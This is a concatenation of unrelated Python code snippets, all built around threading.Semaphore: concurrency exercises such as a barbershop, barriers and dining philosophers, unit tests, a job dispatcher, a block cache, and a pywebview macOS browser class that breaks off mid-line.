class JobManager(LogMaster): """ keeps a queue of jobs, and runs them in a separate thread, while keeping the number of worker thread under a specified treshold. it is not a real thread pool as new thread are fired every time """ def __init__(self, maxthreads, loglevel=logging.INFO): self.setLogger(self.__class__.__name__, loglevel) self.maxthreads = maxthreads self.semaph = Semaphore(value=self.maxthreads) self.jobq = Queue() self.running = True self.dispatcher = Thread(target=self._jobdispatcher, daemon=True) self.dispatcher.start() def putjob(self, job): self.jobq.put(job) def harness(self, job): job.execute() self.semaph.release() def _jobdispatcher(self): self.logger.debug("Started job dispatcher thread") while self.running: self.semaph.acquire() job = self.jobq.get() if job is None: self.semaph.release() continue t = Thread(target=self.harness, args=(job,), daemon=True) t.start() self.logger.debug("Stopped job dispatcher thread")
class BarberShop: def __init__(self, num_chairs): self.ncustomersWaiting = Semaphore(0) self.semaChairs = Semaphore(num_chairs)# number of vacant chairs in barber shop self.nbarbers = Semaphore(0) # check for waiting customers # if there are none, wait # if there are waiting customers, signal one def barber_ready_to_cut(self): self.ncustomersWaiting.acquire() self.nbarbers.release() # enter the barbershop if all num_chairs are not occupied # returns true if the customer entered successfully, and # false if he was turned away at the door def customer_enter(self): if self.semaChairs.acquire(False) : return True else : return False # take a seat and wait until the barber is ready to cut hair def customer_take_a_seat(self): self.ncustomersWaiting.release() # Since release is done first, deadlock won't occur with barber self.nbarbers.acquire() self.semaChairs.release()
class PromptService(object): def __init__(self): self.semaphore = Semaphore(0) self.commandWindow = None self.response = None def setCommandWindow(self, window): self.commandWindow = window def requestInput(self, prompt): if self.commandWindow is None: raise RuntimeError("Command window hasn't registered itself") if prompt is None: prompt = '' self.commandWindow.prompt(prompt, 'standard-output', self.respond, 'standard-input') self.semaphore.acquire() if self.response is None: raise KeyboardInterrupt else: res = self.response self.response = None return str(res) def respond(self, value): self.response = value self.semaphore.release()
class TestPubSubscribe(unittest.TestCase): def onMessage(self, message): self.assertTrue(len(message.payload_objects) > 0) msg_body = message.payload_objects[0].content self.assertIn(msg_body, MESSAGES) self.counter += 1 if self.counter == len(MESSAGES): self.semaphore.release() def setUp(self): self.counter = 0 self.semaphore = Semaphore(0) self.bw_client = Client() self.bw_client.setEntityFromFile(KEY_FILE) self.bw_client.overrideAutoChainTo(True) self.bw_client.subscribe(URI, self.onMessage) def tearDown(self): self.bw_client.close() def testPublishSubscribe(self): for msg in MESSAGES: po = PayloadObject((64, 0, 0, 0), None, msg) self.bw_client.publish(URI, payload_objects=(po,)) self.semaphore.acquire()
def recover_images(parser, destination): """Parse images and save them to <manga>/<chapter>/<image>.""" urls = parser.parse() manga_path = os.path.join(destination, parser.title) ch_digits = len(str(len(urls))) for chapter, pages in urls: #Normalize chapter digits chapter = "0" * (ch_digits - len(str(chapter))) + str(chapter) chapter_path = os.path.join(manga_path, chapter) if not os.path.exists(chapter_path): os.makedirs(chapter_path) savers = list() logging.info('Saving Chapter %s to %s', chapter, chapter_path) pg_digits = len(str(len(pages))) sem = Semaphore(BaseParser.MAX_CONNECTIONS) for page, url in enumerate(pages, start=1): sem.acquire() #Normalize page digits page = "0" * (pg_digits - len(str(page))) + str(page) path = os.path.join(chapter_path, str(page) + '.jpg') saver = utils.ImageSaver(path, url, sem) savers.append(saver) saver.start() map(lambda thread: thread.join(), savers)
class Barrier: def __init__(self, n): self.n = n self.count = 0 self.mutex = Semaphore(value=1) self.turnstile1 = Semaphore(value=0) self.turnstile2 = Semaphore(value=0) def phase1(self): with self.mutex: self.count += 1 if self.count == self.n: logging.debug("Releasing the entry barrier.") for _ in range(self.n): self.turnstile1.release() self.turnstile1.acquire() def phase2(self): with self.mutex: self.count -= 1 if self.count == 1: logging.debug("Unlocking the exit barrier.") for _ in range(self.n): self.turnstile2.release() self.turnstile2.acquire() def wait(self): logging.debug("At the barrier.") self.phase1() logging.debug("Past the barrier.") self.phase2()
def test_max_concurrent_requests(mini_sentry, relay): from time import sleep from threading import Semaphore processing_store = False store_count = Semaphore() mini_sentry.project_configs[42] = mini_sentry.basic_project_config() @mini_sentry.app.endpoint("store_event") def store_event(): nonlocal processing_store assert not processing_store processing_store = True # sleep long, but less than event_buffer_expiry sleep(0.5) store_count.release() sleep(0.5) processing_store = False return "ok" relay = relay( mini_sentry, {"limits": {"max_concurrent_requests": 1}, "cache": {"event_buffer_expiry": 2}}, ) relay.wait_relay_healthcheck() relay.send_event(42) relay.send_event(42) store_count.acquire(timeout=4) store_count.acquire(timeout=4)
class IterableThread(Thread): def __init__(self, storage_object): Thread.__init__(self) self.data = '' self.storage_object = storage_object self.notstarted = True self.semaphore = Semaphore() self.closed = False def read(self, size): while len(self.data) < size and not self.closed: self.semaphore.acquire(True) ret = self.data[:size] self.data = self.data[size:] return ret def write(self, data): self.data += data if not self.isAlive(): self.start() self.semaphore.release() def run(self): self.storage_object.send(self) def close(self): self.closed = True self.semaphore.release()
class BinarySemaphore: def __init__(self, initial): self.sem = Semaphore(initial) def wait(self): self.sem.acquire() def signal(self): self.sem.release()
def _setup_to_do_n_cycles(self, number_of_cycles: int, updates_each_cycle: UpdateCollection=None): """ Sets up the test so that the retriever will only do n cycles. :param number_of_cycles: the number of cycles to do """ if updates_each_cycle is None: updates_each_cycle = UpdateCollection([]) semaphore = Semaphore(0) lock_until_counted = Lock() lock_until_counted.acquire() def increase_counter(*args) -> UpdateCollection: semaphore.release() lock_until_counted.acquire() return updates_each_cycle self.retrieval_manager.update_mapper.get_all_since.side_effect = increase_counter self.retrieval_manager.start() run_counter = 0 while run_counter < number_of_cycles: semaphore.acquire() run_counter += 1 lock_until_counted.release() if run_counter == number_of_cycles: self.retrieval_manager.stop() self.retrieval_manager.update_mapper.get_all_since.side_effect = None
def test_get_all_when_file_moved(self): self.source.start() block_until_synchronised_files_data_source_started(self.source) move_semaphore = Semaphore(0) deleted = False def on_change(change: FileSystemChange): nonlocal deleted if change == FileSystemChange.DELETE: move_semaphore.release() deleted = True if deleted and change == FileSystemChange.CREATE: move_semaphore.release() self.source.add_listener(on_change) to_move_file_path = glob.glob("%s/*" % self.temp_directory)[0] move_to = "%s_moved" % to_move_file_path shutil.move(to_move_file_path, move_to) move_semaphore.acquire() move_semaphore.acquire() self.assertCountEqual(self.source.get_all(), self.data)
class ObjKeeper(object): """ 每种资源 """ def __init__(self, max_size): self.lock = Semaphore(max_size) self.objs = deque() def pop(self): # 获取锁 self.lock.acquire() try: return self.objs.popleft() except: # 代表外面要重新生成新的 return None def push(self, obj): if obj: self.objs.append(obj) # 无论如何都要释放 self.lock.release()
def pmap(f, l, limit=None): """A parallel version of map, that preserves ordering. Example: >>> pmap(lambda x: x*x, [1,2,3]) [1, 4, 9] >>> import time >>> t1 = time.clock() >>> null = pmap(lambda x: time.sleep(1), range(10), 3) >>> time.clock() - t1 > 0.001 True """ if limit: pool_semaphore = Semaphore(limit) else: pool_semaphore = None pool = [] res = range(len(l)) for i in range(len(l)): t = Thread(target=mapper, args=(f, l[i], res, i, pool_semaphore)) pool.append(t) if limit: pool_semaphore.acquire() t.start() map(lambda x: x.join(), pool) return res
def my_scan(myip,myemail): global manager Mydir="/root/myopenvas/results/"+myemail[0:myemail.find('@')] if os.path.isfile(Mydir+"/"+myip+".html"): print myip+" already exist" return start=datetime.datetime.now() print "Start of: "+myip+" at : ",start # """ Sem =Semaphore(0) scan_id,target_id=manager.launch_scan( target=myip, profile="Full and fast", callback_end=partial(lambda x:x.release(),Sem), callback_progress=my_print_status ) Sem.acquire() # """ end=datetime.datetime.now() print "End of: "+myip+" at : ",end print "*******************************" print "Cost :",(end-start) print "*******************************" report_id=manager.get_tasks_last_report_id(scan_id) write_report(report_id,myip,myemail)
class OneLaneBridge(object): """ A one-lane bridge allows multiple cars to pass in either direction, but at any point in time, all cars on the bridge must be going in the same direction. Cars wishing to cross should call the cross function, once they have crossed they should call finished() """ def __init__(self): self.direction = random.randrange(2) self.cars_on = Semaphore(0) self.num_cars_on = 0 self.waiting = 0 def cross(self,direction): """wait for permission to cross the bridge. direction should be either north (0) or south (1).""" if (direction != self.direction) and self.num_cars_on: print "Waiting going direction %d" % direction self.waiting += 1 self.cars_on.acquire() # Bridge is empty or == direction so we can take the opening and cross self.direction = direction self.num_cars_on += 1 def finished(self, direction): self.num_cars_on -= 1 if not self.num_cars_on: for car in range(self.waiting): self.cars_on.release() self.waiting = 0
class Race: def __init__(self): self.stageFinishCount = 0 self.stageStartCount = 0 self.mutex = Semaphore(1) #used for mutual exclusion while writing self.stageFinishSema = Semaphore(0) self.stageStartSema = Semaphore(0) #This is used so that people dont try to finish the next stage until everyone has left the prev stage def teammate_start_stage(self): count = 0 with self.mutex: self.stageStartCount = self.stageStartCount + 1 count = self.stageStartCount if count < NUM_TEAMMATES: self.stageStartSema.acquire() else: self.stageStartCount = 0 for i in range(NUM_TEAMMATES-1): self.stageStartSema.release() # only last person starting the stage would release all thread. def teammate_finish_stage(self): count = 0 #local variable separate to each thread with self.mutex: self.stageFinishCount = self.stageFinishCount + 1 count = self.stageFinishCount if count < NUM_TEAMMATES: self.stageFinishSema.acquire() else: self.stageFinishCount = 0 for i in range(NUM_TEAMMATES-1): self.stageFinishSema.release() #last teammate only can do this
def wait_for_call(obj, target, callback=None): sem = Semaphore(0) result = WaitResult() unpatched = getattr(obj, target) def maybe_release(args, kwargs, res, exc_info): should_release = True if callable(callback): should_release = callback(args, kwargs, res, exc_info) if should_release: result.send(res, exc_info) sem.release() def wraps(*args, **kwargs): res = None exc_info = None try: res = unpatched(*args, **kwargs) except Exception: exc_info = sys.exc_info() maybe_release(args, kwargs, res, exc_info) if exc_info is not None: six.reraise(*exc_info) return res with patch.object(obj, target, new=wraps): yield result sem.acquire()
class Synchronized: def __init__(self): from threading import Semaphore self.__lock = Semaphore() self.__ownerThread = None classdict = self.__class__.__dict__ for attr in classdict.get("__synchronized__", ()): try: method = classdict[attr] if callable(method): self.__dict__[attr] = CallHook(self, method) else: if VERBOSE: print "! Synchronized: Object is not callable: %s" % (attr,) except KeyError: if VERBOSE: print "! Synchronized: Method not found: %s" % (attr,) def releaseInstance(self): self.__ownerThread = None self.__lock.release() def acquireInstance(self): self.__lock.acquire() self.__ownerThread = currentThread() def ownerThread(self): return self.__ownerThread
def test_basic_action(self): start = time.time() semaphore = Semaphore(0) controller = self._get_controller() controller.set_unittest_semaphore(semaphore) self.assertEquals(len(controller.schedules), 0) with self.assertRaises(RuntimeError) as ctx: # Doesn't support duration controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', None, None, 1000, None) self.assertEquals(ctx.exception.message, 'A schedule of type BASIC_ACTION does not have a duration. It is a one-time trigger') invalid_arguments_error = 'The arguments of a BASIC_ACTION schedule must be of type dict with arguments `action_type` and `action_number`' with self.assertRaises(RuntimeError) as ctx: # Incorrect argument controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', 'foo', None, None, None) self.assertEquals(ctx.exception.message, invalid_arguments_error) with self.assertRaises(RuntimeError) as ctx: # Incorrect argument controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', {'action_type': 1}, None, None, None) self.assertEquals(ctx.exception.message, invalid_arguments_error) controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', {'action_type': 1, 'action_number': 2}, None, None, None) self.assertEquals(len(controller.schedules), 1) self.assertEquals(controller.schedules[0].name, 'basic_action') self.assertEquals(controller.schedules[0].status, 'ACTIVE') controller.start() semaphore.acquire() self.assertEquals(GatewayApi.RETURN_DATA['do_basic_action'], (1, 2)) self.assertEquals(len(controller.schedules), 1) self.assertEquals(controller.schedules[0].name, 'basic_action') self.assertEquals(controller.schedules[0].status, 'COMPLETED') controller.stop()
def test_group_action(self): start = time.time() semaphore = Semaphore(0) controller = self._get_controller() controller.set_unittest_semaphore(semaphore) # New controller is empty self.assertEquals(len(controller.schedules), 0) with self.assertRaises(RuntimeError) as ctx: # Doesn't support duration controller.add_schedule('group_action', start + 120, 'GROUP_ACTION', None, None, 1000, None) self.assertEquals(ctx.exception.message, 'A schedule of type GROUP_ACTION does not have a duration. It is a one-time trigger') with self.assertRaises(RuntimeError) as ctx: # Incorrect argument controller.add_schedule('group_action', start + 120, 'GROUP_ACTION', 'foo', None, None, None) self.assertEquals(ctx.exception.message, 'The arguments of a GROUP_ACTION schedule must be an integer, representing the Group Action to be executed') controller.add_schedule('group_action', start + 120, 'GROUP_ACTION', 1, None, None, None) self.assertEquals(len(controller.schedules), 1) self.assertEquals(controller.schedules[0].name, 'group_action') self.assertEquals(controller.schedules[0].status, 'ACTIVE') controller.start() semaphore.acquire() self.assertEquals(GatewayApi.RETURN_DATA['do_group_action'], 1) self.assertEquals(len(controller.schedules), 1) self.assertEquals(controller.schedules[0].name, 'group_action') self.assertEquals(controller.schedules[0].status, 'COMPLETED') controller.stop()
class ThreadMaster: ''' classdocs ''' def __init__(self, maxThreads): self.maxThreads = maxThreads self.freeThreads = Semaphore(value=self.maxThreads) def waitUntilAllReady(self): for c in range(0, self.maxThreads ): self.freeThreads.acquire() for c in range(0, self.maxThreads ): self.freeThreads.release() def startFunction(self, fun, ar ): newThread = Thread(target=fun, args=ar) self.freeThreads.acquire() newThread.start() def done(self): self.freeThreads.release();
class JobWatcher(Thread): """ Mechanism to watch Job activity, it will cleanup run instances and re-generate run if it is a multi_run job. """ def __init__(self, workspace): super().__init__() self.workspace = workspace self.watcher_lock = Semaphore() def run(self): """ Loop for looking on finished run """ logging.debug("Start JobWatcher") while True: self.watcher_lock.acquire(blocking=False) with self.watcher_lock: logging.debug("Watcher is watching") stopping = bool(self.workspace.metadata["status"] & STOPPED) to_removes = [x.job for x in self.workspace.runs.values() if not x.is_alive()] for job in to_removes: del self.workspace.runs[job.name] if job.multi_run and not stopping: thread, trigger = job.schedule(self.workspace) self.workspace.runs[job.name] = thread if trigger is not None: self.workspace.triggers.append(trigger) thread.start() for trigger in self.workspace.triggers: if not trigger.is_alive(): self.workspace.triggers.remove(trigger) logging.debug("End JobWatcher")
class AsyncWorker(object): def __init__(self, view): self.view = view self.plugin = get_plugin(view) self.content = view.substr(sublime.Region(0, view.size())) self.filename = view.file_name() self.view_id = view.buffer_id() self.errors = None self.sem = Semaphore() self.sem.acquire() self.has_round_queued = False def do_more_work(self): self.content = self.view.substr(sublime.Region(0, self.view.size())) if not self.has_round_queued: self.sem.release() self.has_round_queued = True def final(self): self.plugin.handle_errors(self.view, self.errors) self.plugin.set_error_status(self.view) self.has_round_queued = False def work(self): while True: # Wait on semaphore self.sem.acquire() # Update the script self.plugin.update_server_code(self.filename, self.content) # Get errors self.errors = self.plugin.serv_get_errors(self.filename) sublime.set_timeout(self.final, 1) self.content = self.plugin.views_text[self.filename] sleep(1.3)
def _solve_mt(self, formula): solverThreads = [] solution = None sem = Semaphore(0) for solver in self.solvers: sThread = _PortfolioThread(solver, formula, sem) solverThreads.append(sThread) sThread.start() # Wait for at least one thread to finish sem.acquire() for sThread in solverThreads: if solution is None and sThread.solution is not None: solution = sThread.solution if not self.benchMode: self._benchmark = sThread.solver.getBenchmark() if not self.benchMode: sThread.solver.abort() for sThread in solverThreads: sThread.join() assert solution is not None, "Solver returned with invalid solution" if self.benchMode: self._benchmark = [sThread.solver.getBenchmark() for sThread in solverThreads] return solution
class Footman: def __init__(self, num_philosophers, num_meals): self.num_philosophers = num_philosophers self.num_meals = num_meals self.forks = [Semaphore(1) for i in range(self.num_philosophers)] self.footman = Semaphore(self.num_philosophers - 1) # at most one philosopher cannot dine def left(self, i): return i def right(self, i): return (i + 1) % self.num_philosophers def get_forks(self, i): self.footman.acquire() self.forks[self.right(i)].acquire() self.forks[self.left(i)].acquire() def put_forks(self, i): self.forks[self.right(i)].release() self.forks[self.left(i)].release() self.footman.release() def philosopher(self, id): while self.num_meals > 0: self.get_forks(id) # eating self.num_meals -= 1 sleep(rng.random() / 100) self.put_forks(id) # thinking sleep(rng.random() / 100)
class _Result(object): ''' Class for a result composed of partials. Partials are stored in a dict: ``` { start_index: chunk, ... } ``` To get the result, a call to `get` method must be done. The call to `get` is blocking until the result is `completed`. Everytime a partial is added using the method `add_partial`, the count of chunks is incremented and compared with the expected number of chunks (given on `__init__`). If the count is equal, then a semaphore is released. The same semaphore is acquired on `get` call. That's why `get` call is blocking. ''' def __init__(self, no_chunks): super(_Result, self).__init__() self._n = no_chunks self._res = {} self._lock = Lock() self._no_collected = 0 self._completed_sem = Semaphore(0) @property def completed(self): self._lock.acquire() comp = self._no_collected == self._n self._lock.release() return comp # no setter provided @property def partial(self): return self._res def add_partial(self, key, partial): # thread-safe self._lock.acquire() self._res[key] = partial self._no_collected += 1 self._lock.release() if self.completed: self._completed_sem.release() def get(self): self._completed_sem.acquire() # release the semaphore for further # invokations of get() self._completed_sem.release() return self._res
class ReusableBarrierSem(): def __init__(self, num_threads): self.num_threads = num_threads self.count_threads1 = self.num_threads self.count_threads2 = self.num_threads self.counter_lock = Lock() # protejam decrementarea numarului de threaduri self.threads_sem1 = Semaphore(0) # contorizam numarul de threaduri pentru prima etapa self.threads_sem2 = Semaphore(0) # contorizam numarul de threaduri pentru a doua etapa def wait(self): self.phase1() self.phase2() def phase1(self): with self.counter_lock: self.count_threads1 -= 1 if self.count_threads1 == 0: for i in range(self.num_threads): self.threads_sem1.release() self.count_threads2 = self.num_threads self.threads_sem1.acquire() def phase2(self): with self.counter_lock: self.count_threads2 -= 1 if self.count_threads2 == 0: for i in range(self.num_threads): self.threads_sem2.release() self.count_threads1 = self.num_threads self.threads_sem2.acquire()
class StatisticQueue: def __init__(self, stats): self._semaphore = Semaphore() self.result = {} self.stats = stats def write_result(self, data): self._semaphore.acquire() self.result.update(data) self._semaphore.release() def start_parse(self): self.stats.connect() self.stats.init_message_stack() func_to_start = [ self.stats.get_top3_speakers, self.stats.get_most_frequent_youtube_video, self.stats.get_time_activity, self.stats.get_abusive_expressions, ] threads = [] for func in func_to_start: thread = Thread(target=func, args=(self, )) threads.append(thread) thread.start() for t in threads: t.join() return self.result
class BoundedHashSet(object): def __init__(self, capacity): """ Lock is a mutex or a semaphore with count = 1 This is used to guard the critical section and ensure mutual exclusion so only 1 thread has access at a time. Semaphore is to enforce capacity. Everytime sem.acquire() is called, capacity decrements by 1. When sem.release() is called, capacity increments by 1. If sem.acquire() is called when capacity == 0, it blocks. :param capacity: :return: """ self.mutex = Lock() self.st = set() self.sem = Semaphore(capacity) def add(self, item): if item not in self.st: self.sem.acquire() self.mutex.acquire() self.st.add(item) self.mutex.release() def erase(self, item): self.mutex.acquire() self.st.remove(item) self.mutex.release() self.sem.release()
class CollapseTransition(XiboTransition): def run(self): self.lock = Semaphore() self.lock.acquire() # Only valid as an exit transition if self.media1 != None: if self.options1['transOutDuration'] > 0: self.outDuration = int(self.options1['transOutDuration']) else: self.outDuration = 1000 self.__animate__(self.media1.getName(),self.media1.getX(), self.media1.getY(),self.media1.getWidth(),self.media1.getHeight(),self.outDuration,self.next) self.lock.acquire() self.callback() def next(self): self.lock.release() def __animate__(self,name,currentX,currentY,w,h,duration,callback): # ('ease', nodeName, animation duration, animation attribute, start position, finish position, callback on Stop, easeIn duration, easeOut duration) self.log.log(5,"info","CollapseTransition: Collapsing " + name + " over " + str(duration) + "ms") self.p.enqueue('anim',('linear',name,duration,'y',currentY,int(h/2),None)) self.p.enqueue('anim',('linear',name,duration,'height',int(h),0,callback)) self.p.enqueue('timer',(duration,self.next))
Thread(target=consumer, args=(random.randrange(n, n + max_items + 2), ))) for thread in threads: # Starts all the threads. thread.start() for thread in threads: # Waits for threads to complete before moving on with the main script. thread.join() logging.info("All done.") logging.info("Semaphore vs Bounded Semaphore") # Usually, you create a Semaphore that will allow a certain number of threads # into a section of code. This one starts at 5. s1 = Semaphore(5) # When you want to enter the section of code, you acquire it first. # That lowers it to 4. (Four more threads could enter this section.) s1.acquire() # Then you do whatever sensitive thing needed to be restricted to five threads. # When you're finished, you release the semaphore, and it goes back to 5. s1.release() # That's all fine, but you can also release it without acquiring it first. s1.release() # The counter is now 6! That might make sense in some situations, but not in most. logging.info(s1._value) # => 6 # If that doesn't make sense in your situation, use a BoundedSemaphore. s2 = BoundedSemaphore(5) # Start at 5.
class BlockCache(object): def __init__(self): #This will contain the actual data of each block self.descriptors_dict = {} #Structure to store the cache metadata of each block self.descriptors = [] #Cache statistics self.get_hits = 0 self.put_hits = 0 self.misses = 0 self.evictions = 0 self.reads = 0 self.writes = 0 self.cache_size_bytes = 0 #Eviction policy self.policy = "LFU" #Synchronize shared cache content self.semaphore = Semaphore() def access_cache(self, operation='PUT', block_id=None, block_data=None, etag=None): result = None if ENABLE_CACHE: self.semaphore.acquire() if operation == 'PUT': result = self._put(block_id, block_data, etag) elif operation == 'GET': result = self._get(block_id) else: raise Exception("Unsupported cache operation" + operation) #Sort descriptors based on eviction policy order self._sort_descriptors() self.semaphore.release() return result def _put(self, block_id, block_size, etag): self.writes += 1 to_evict = [] #Check if the cache is full and if the element is new if CACHE_MAX_SIZE <= (self.cache_size_bytes + block_size ) and block_id not in self.descriptors_dict: #Evict as many files as necessary until having enough space for new one while (CACHE_MAX_SIZE <= (self.cache_size_bytes + block_size)): #Get the last element ordered by the eviction policy self.descriptors, evicted = self.descriptors[: -1], self.descriptors[ -1] #Reduce the size of the cache self.cache_size_bytes -= evicted.size #Icrease evictions count and add to self.evictions += 1 to_evict.append(evicted.block_id) #Remove from evictions dict del self.descriptors_dict[evicted.block_id] if block_id in self.descriptors_dict: descriptor = self.descriptors_dict[block_id] self.descriptors_dict[block_id].size = block_size self.descriptors_dict[block_id].etag = etag descriptor.put_hit() self.put_hits += 1 else: #Add the new element to the cache descriptor = CacheObjectDescriptor(block_id, block_size, etag) self.descriptors.append(descriptor) self.descriptors_dict[block_id] = descriptor self.cache_size_bytes += block_size assert len(self.descriptors) == len(self.descriptors_dict.keys()) ==\ len(self.descriptors_dict.keys()), "Unequal length in cache data structures" return to_evict def _get(self, block_id): self.reads += 1 if block_id in self.descriptors_dict: self.descriptors_dict[block_id].get_hit() self.get_hits += 1 return block_id, self.descriptors_dict[ block_id].size, self.descriptors_dict[block_id].etag self.misses += 1 return None, 0, '' def _sort_descriptors(self): #Order the descriptor list depending on the policy if self.policy == "LRU": self.descriptors.sort(key=lambda desc: desc.last_access, reverse=True) elif self.policy == "LFU": self.descriptors.sort(key=lambda desc: desc.get_hits, reverse=True) else: raise Exception("Unsupported caching policy.") def write_statistics(self, statistics_manager): if ENABLE_CACHE: statistics_manager.cache_state(self.get_hits, self.put_hits, self.misses, self.evictions, self.reads, self.writes, self.cache_size_bytes) def cache_state(self): print "CACHE GET HITS: ", self.get_hits print "CACHE PUT HITS: ", self.put_hits print "CACHE MISSES: ", self.misses print "CACHE EVICTIONS: ", self.evictions print "CACHE READS: ", self.reads print "CACHE WRITES: ", self.writes print "CACHE SIZE: ", self.cache_size_bytes for descriptor in self.descriptors: print "Object: ", descriptor.block_id, descriptor.last_access, descriptor.get_hits, descriptor.put_hits, descriptor.num_accesses, descriptor.size
class BrowserView: instances = {} app = AppKit.NSApplication.sharedApplication() cascade_loc = Foundation.NSMakePoint(100.0, 0.0) class WindowDelegate(AppKit.NSObject): def windowShouldClose_(self, window): i = BrowserView.get_instance('window', window) i.closing.set() quit = localization['global.quit'] cancel = localization['global.cancel'] msg = localization['global.quitConfirmation'] if not i.confirm_close or BrowserView.display_confirmation_dialog( quit, cancel, msg): return Foundation.YES else: return Foundation.NO def windowWillClose_(self, notification): # Delete the closed instance from the dict i = BrowserView.get_instance('window', notification.object()) del BrowserView.instances[i.uid] if i.pywebview_window in windows: windows.remove(i.pywebview_window) i.closed.set() if BrowserView.instances == {}: BrowserView.app.stop_(self) class JSBridge(AppKit.NSObject): def initWithObject_(self, window): super(BrowserView.JSBridge, self).init() self.window = window return self def userContentController_didReceiveScriptMessage_( self, controller, message): func_name, param, value_id = json.loads(message.body()) if param is WebKit.WebUndefined.undefined(): param = None js_bridge_call(self.window, func_name, param, value_id) class BrowserDelegate(AppKit.NSObject): # Display a JavaScript alert panel containing the specified message def webView_runJavaScriptAlertPanelWithMessage_initiatedByFrame_completionHandler_( self, webview, message, frame, handler): AppKit.NSRunningApplication.currentApplication( ).activateWithOptions_( AppKit.NSApplicationActivateIgnoringOtherApps) alert = AppKit.NSAlert.alloc().init() alert.setInformativeText_(message) alert.runModal() if not handler.__block_signature__: handler.__block_signature__ = BrowserView.pyobjc_method_signature( b'v@') handler() # Display a JavaScript confirm panel containing the specified message def webView_runJavaScriptConfirmPanelWithMessage_initiatedByFrame_completionHandler_( self, webview, message, frame, handler): ok = localization['global.ok'] cancel = localization['global.cancel'] if not handler.__block_signature__: handler.__block_signature__ = BrowserView.pyobjc_method_signature( b'v@B') if BrowserView.display_confirmation_dialog(ok, cancel, message): handler(Foundation.YES) else: handler(Foundation.NO) # Display an open panel for <input type="file"> element def webView_runOpenPanelWithParameters_initiatedByFrame_completionHandler_( self, webview, param, frame, handler): i = list(BrowserView.instances.values())[0] files = i.create_file_dialog(OPEN_DIALOG, '', param.allowsMultipleSelection(), '', [], main_thread=True) if not handler.__block_signature__: handler.__block_signature__ = BrowserView.pyobjc_method_signature( b'v@@') if files: urls = [ Foundation.NSURL.URLWithString_(BrowserView.quote(i)) for i in files ] handler(urls) else: handler(nil) # Open target="_blank" links in external browser def webView_createWebViewWithConfiguration_forNavigationAction_windowFeatures_( self, webview, config, action, features): if action.navigationType() == getattr( WebKit, 'WKNavigationTypeLinkActivated', 0): webbrowser.open(action.request().URL().absoluteString(), 2, True) return nil # WKNavigationDelegate method, invoked when a navigation decision needs to be made def webView_decidePolicyForNavigationAction_decisionHandler_( self, webview, action, handler): # The event that might have triggered the navigation event = AppKit.NSApp.currentEvent() if not handler.__block_signature__: handler.__block_signature__ = BrowserView.pyobjc_method_signature( b'v@i') """ Disable back navigation on pressing the Delete key: """ # Check if the requested navigation action is Back/Forward if action.navigationType() == getattr( WebKit, 'WKNavigationTypeBackForward', 2): # Check if the event is a Delete key press (keyCode = 51) if event and event.type( ) == AppKit.NSKeyDown and event.keyCode() == 51: # If so, ignore the request and return handler( getattr(WebKit, 'WKNavigationActionPolicyCancel', 0)) return # Normal navigation, allow handler(getattr(WebKit, 'WKNavigationActionPolicyAllow', 1)) # Show the webview when it finishes loading def webView_didFinishNavigation_(self, webview, nav): # Add the webview to the window if it's not yet the contentView i = BrowserView.get_instance('webkit', webview) if i: if not webview.window(): i.window.setContentView_(webview) i.window.makeFirstResponder_(webview) script = parse_api_js(i.js_bridge.window, 'cocoa') i.webkit.evaluateJavaScript_completionHandler_( script, lambda a, b: None) if not i.text_select: i.webkit.evaluateJavaScript_completionHandler_( disable_text_select, lambda a, b: None) print_hook = 'window.print = function() { window.webkit.messageHandlers.browserDelegate.postMessage("print") };' i.webkit.evaluateJavaScript_completionHandler_( print_hook, lambda a, b: None) i.loaded.set() # Handle JavaScript window.print() def userContentController_didReceiveScriptMessage_( self, controller, message): if message.body() == 'print': i = BrowserView.get_instance('_browserDelegate', self) BrowserView.print_webview(i.webkit) class FileFilterChooser(AppKit.NSPopUpButton): def initWithFilter_(self, file_filter): super(BrowserView.FileFilterChooser, self).init() self.filter = file_filter self.addItemsWithTitles_([i[0] for i in self.filter]) self.setAction_('onChange:') self.setTarget_(self) return self def onChange_(self, sender): option = sender.indexOfSelectedItem() self.window().setAllowedFileTypes_(self.filter[option][1]) class WebKitHost(WebKit.WKWebView): def mouseDown_(self, event): i = BrowserView.get_instance('webkit', self) window = self.window() if i.frameless: windowFrame = window.frame() if windowFrame is None: raise RuntimeError('Failed to obtain screen') self.initialLocation = window.convertBaseToScreen_( event.locationInWindow()) self.initialLocation.x -= windowFrame.origin.x self.initialLocation.y -= windowFrame.origin.y super(BrowserView.WebKitHost, self).mouseDown_(event) def mouseDragged_(self, event): i = BrowserView.get_instance('webkit', self) window = self.window() if i.frameless: screenFrame = AppKit.NSScreen.mainScreen().frame() if screenFrame is None: raise RuntimeError('Failed to obtain screen') windowFrame = window.frame() if windowFrame is None: raise RuntimeError('Failed to obtain frame') currentLocation = window.convertBaseToScreen_( window.mouseLocationOutsideOfEventStream()) newOrigin = AppKit.NSMakePoint( (currentLocation.x - self.initialLocation.x), (currentLocation.y - self.initialLocation.y)) if (newOrigin.y + windowFrame.size.height) > \ (screenFrame.origin.y + screenFrame.size.height): newOrigin.y = screenFrame.origin.y + \ (screenFrame.size.height + windowFrame.size.height) window.setFrameOrigin_(newOrigin) if event.modifierFlags() & getattr( AppKit, 'NSEventModifierFlagControl', 1 << 18): i = BrowserView.get_instance('webkit', self) if not _debug: return super(BrowserView.WebKitHost, self).mouseDown_(event) def rightMouseDown_(self, event): i = BrowserView.get_instance('webkit', self) if _debug: super(BrowserView.WebKitHost, self).rightMouseDown_(event) def performKeyEquivalent_(self, theEvent): """ Handle common hotkey shortcuts as copy/cut/paste/undo/select all/quit :param theEvent: :return: """ if theEvent.type() == AppKit.NSKeyDown and theEvent.modifierFlags( ) & AppKit.NSCommandKeyMask: responder = self.window().firstResponder() keyCode = theEvent.keyCode() if responder != None: handled = False range_ = responder.selectedRange() hasSelectedText = len(range_) > 0 if keyCode == 7 and hasSelectedText: #cut responder.cut_(self) handled = True elif keyCode == 8 and hasSelectedText: #copy responder.copy_(self) handled = True elif keyCode == 9: # paste responder.paste_(self) handled = True elif keyCode == 0: # select all responder.selectAll_(self) handled = True elif keyCode == 6: # undo if responder.undoManager().canUndo(): responder.undoManager().undo() handled = True elif keyCode == 12: # quit BrowserView.app.stop_(self) return handled def __init__(self, window): BrowserView.instances[window.uid] = self self.uid = window.uid self.pywebview_window = window self.js_bridge = None self._file_name = None self._file_name_semaphore = Semaphore(0) self._current_url_semaphore = Semaphore(0) self.closed = window.closed self.closing = window.closing self.shown = window.shown self.loaded = 